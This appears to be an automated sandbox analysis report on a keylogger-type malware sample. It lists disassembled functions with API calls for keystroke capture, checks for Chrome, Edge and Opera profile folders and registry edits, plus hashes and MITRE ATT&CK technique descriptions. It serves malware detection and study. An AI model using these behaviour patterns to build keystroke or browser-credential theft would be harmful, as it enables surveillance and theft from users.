Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF

Function 004460E2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,80E85006,00000001,?,0043CC5A), ref: 00446153

Strings

e]j[/, xrefs: 004460E8
LCMapStringEx, xrefs: 004460FD

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx$e]j[/
API String ID: 2568140703-822133445
Opcode ID: cb4bf5b9dfda82254125557d97bd0ba15624ce79b92165b85269b22217c8aec6
Instruction ID: 29d104d56a746b6e3d8c6bfc4e4f345cedd73e0e959273b8f55d19685ecbe325
Opcode Fuzzy Hash: cb4bf5b9dfda82254125557d97bd0ba15624ce79b92165b85269b22217c8aec6
Instruction Fuzzy Hash: 64014832540209FFDF025F91DC01EEE7F62EF09725F15411AFE0526162CA7A8931EB99

Function 00445D9A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00444FF8,?,00000000,00401D35), ref: 00445E05

Strings

e]j[/, xrefs: 00445DA0
GetDateFormatEx, xrefs: 00445DAB, 00445DB5

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: DateFormat
String ID: GetDateFormatEx$e]j[/
API String ID: 2793631785-3685612113
Opcode ID: 83d459e22b747e1ba449f26712d936c643db6462a5c094f840632f959ae35b8f
Instruction ID: 2581821ad1a273832b31fe4374d0a2d6428b3ba05a0e0b936fde09cfc06c3dc3
Opcode Fuzzy Hash: 83d459e22b747e1ba449f26712d936c643db6462a5c094f840632f959ae35b8f
Instruction Fuzzy Hash: 7D01783654061DFFDF125F92DC06EAE3F62EF18721F10401AFE0526162CA7A8931EB99

Function 00445EDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00444FF8,?,00000000,00401D35), ref: 00445F35

Strings

e]j[/, xrefs: 00445EE2
GetTimeFormatEx, xrefs: 00445EED, 00445EF7

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: FormatTime
String ID: GetTimeFormatEx$e]j[/
API String ID: 3606616251-675469719
Opcode ID: 0143b7ebd80935504ebf1db551cea629c52e715d9c1a1efa8aedb24c44b66157
Instruction ID: 290a5090294d2c817ac4d65ce188d128003dc1b6ccbca6138b0cea2d321cecae
Opcode Fuzzy Hash: 0143b7ebd80935504ebf1db551cea629c52e715d9c1a1efa8aedb24c44b66157
Instruction Fuzzy Hash: 9BF0C231600718BBDF016F55DC42EAF7F61EF19711F10401AFC011A263DAB68924AB99

Function 00445F4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(?,?,00000000), ref: 00445F96

Strings

GetUserDefaultLocaleName, xrefs: 00445F5D, 00445F67
e]j[/, xrefs: 00445F52

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: DefaultUser
String ID: GetUserDefaultLocaleName$e]j[/
API String ID: 3358694519-1731085875
Opcode ID: 4a0aff41ba8c0e474a77637a115638f270b672b00ae2de272ae8f72718f3d960
Instruction ID: 80ae4ae63f9a01140f0a8b509b34e56dd657fd760970d70c8d9bf3eb7c80196d
Opcode Fuzzy Hash: 4a0aff41ba8c0e474a77637a115638f270b672b00ae2de272ae8f72718f3d960
Instruction Fuzzy Hash: 5CF0F631640B08BBDF106F51DC05A5E7B51DB05711F50402AFD055A153CA764D14DA89

Function 00446015 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,00441FFC,00000000,00000001,?,?,00441FFC,?,?,004419DC,?,00000004), ref: 00446061

Strings

IsValidLocaleName, xrefs: 00446026, 00446030
e]j[/, xrefs: 0044601B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$e]j[/
API String ID: 1901932003-57705276
Opcode ID: b054bd3916ddd2ba57006396562c7893169132d42bb82d3f510361c4bcb7a8ad
Instruction ID: ed28e2b719706b0c64987dcb04d78b5b18ad7d142d59a06ee6cf6e77c4dbf8d2
Opcode Fuzzy Hash: b054bd3916ddd2ba57006396562c7893169132d42bb82d3f510361c4bcb7a8ad
Instruction Fuzzy Hash: 37F09E30A40718BBDB10AB319C02F6E7B54DB05712F11002BFD052B283CDB94D00858D

Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A

Strings

\AppData\Local\Microsoft\Edge\, xrefs: 0040B484
UserProfile, xrefs: 0040B46E

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9

Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040B421
UserProfile, xrefs: 0040B40B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD

Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD

Strings

\Opera Software\Opera Stable\, xrefs: 0040B4E7
AppData, xrefs: 0040B4D1

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD

Function 00445FB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,0046B860,0044D512,0046B860,0000001C,00452E0B,?,FF8BC35D,00000000,?,?,?,004527E7,00000000,?,FF8BC35D), ref: 00445FFE

Strings

e]j[/, xrefs: 00445FB9
InitializeCriticalSectionEx, xrefs: 00445FCE

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$e]j[/
API String ID: 2593887523-3964454929
Opcode ID: aba47f6367d0950f3b5e6c038e952a2c973cfc5539e1e773ca69e7731f961e63
Instruction ID: eace731bee723f32fef4665a4ce367c6779836d7e0ccbf50db0f0dc52f8f8819
Opcode Fuzzy Hash: aba47f6367d0950f3b5e6c038e952a2c973cfc5539e1e773ca69e7731f961e63
Instruction Fuzzy Hash: EAF02431640318FBCF005F61DC01D9E7F61DB04721F11416AFD041A262CA758911DB9D

Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040A597

Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A

Strings

[AltL], xrefs: 0040A5D9
[AltR], xrefs: 0040A5CD

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF

Function 00445C3F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00445C7E

Strings

e]j[/, xrefs: 00445C45
FlsAlloc, xrefs: 00445C5A

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc$e]j[/
API String ID: 2773662609-970251901
Opcode ID: b200e746d9140867b8c3004cc2b4b4bb7ca2f29db17129868cd5451f549109d3
Instruction ID: 80f2e38c347af4fef53e11fa517848bede341cb2a71d1f3e8b964754cf2fa23b
Opcode Fuzzy Hash: b200e746d9140867b8c3004cc2b4b4bb7ca2f29db17129868cd5451f549109d3
Instruction Fuzzy Hash: 3EE0A331A40B18FFD7006BA1AC4596DB750DB05722F51016BFC0117343DD784D01C5DE

Function 00445C95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(?), ref: 00445CD4

Strings

e]j[/, xrefs: 00445C9B
FlsFree, xrefs: 00445CB0

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Free
String ID: FlsFree$e]j[/
API String ID: 3978063606-396809204
Opcode ID: 628d94445bcaf1d08be01e0fd88990404d6531680dc47abf44bc87352d338b29
Instruction ID: e1764e34fd8fb931cf54c25deeeb947b0c686fc7af2a0e448fd67dcf30660644
Opcode Fuzzy Hash: 628d94445bcaf1d08be01e0fd88990404d6531680dc47abf44bc87352d338b29
Instruction Fuzzy Hash: 64E0AB31B44B28BBDB00AB219C82E3EBB50CB04B12B21006FFC016B243DEB55D04DADE

Function 00445E86 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00438857), ref: 00445EC5

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00445EA1
e]j[/, xrefs: 00445E8C

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime$e]j[/
API String ID: 2086374402-2702236169
Opcode ID: c868d2ca281dc300b21c9d483b217b7ddbafb683165248fca62e5003a121b567
Instruction ID: 5efaacec71e5791a5abf2e0b24978270060db9ddf2287fd6997e227e2b5fab93
Opcode Fuzzy Hash: c868d2ca281dc300b21c9d483b217b7ddbafb683165248fca62e5003a121b567
Instruction Fuzzy Hash: 33E05C31B01B18BBC7106F259C4193EB754CB14B12B61007BFC0507243DD758E0085DD

Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040A5F1

Strings

[CtrlL], xrefs: 0040A61F
[CtrlR], xrefs: 0040A60E

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF

Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
RegDeleteValueW.ADVAPI32(?,?), ref: 00412436

Strings

6h@, xrefs: 00412414

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: 6h@
API String ID: 2654517830-73392143
Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664

Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
GetLastError.KERNEL32 ref: 0043B4E9
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799

Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00410955), ref: 004105F1
IsBadReadPtr.KERNEL32(?,00000014,00410955), ref: 004106BD
SetLastError.KERNEL32(0000007F), ref: 004106DF
SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

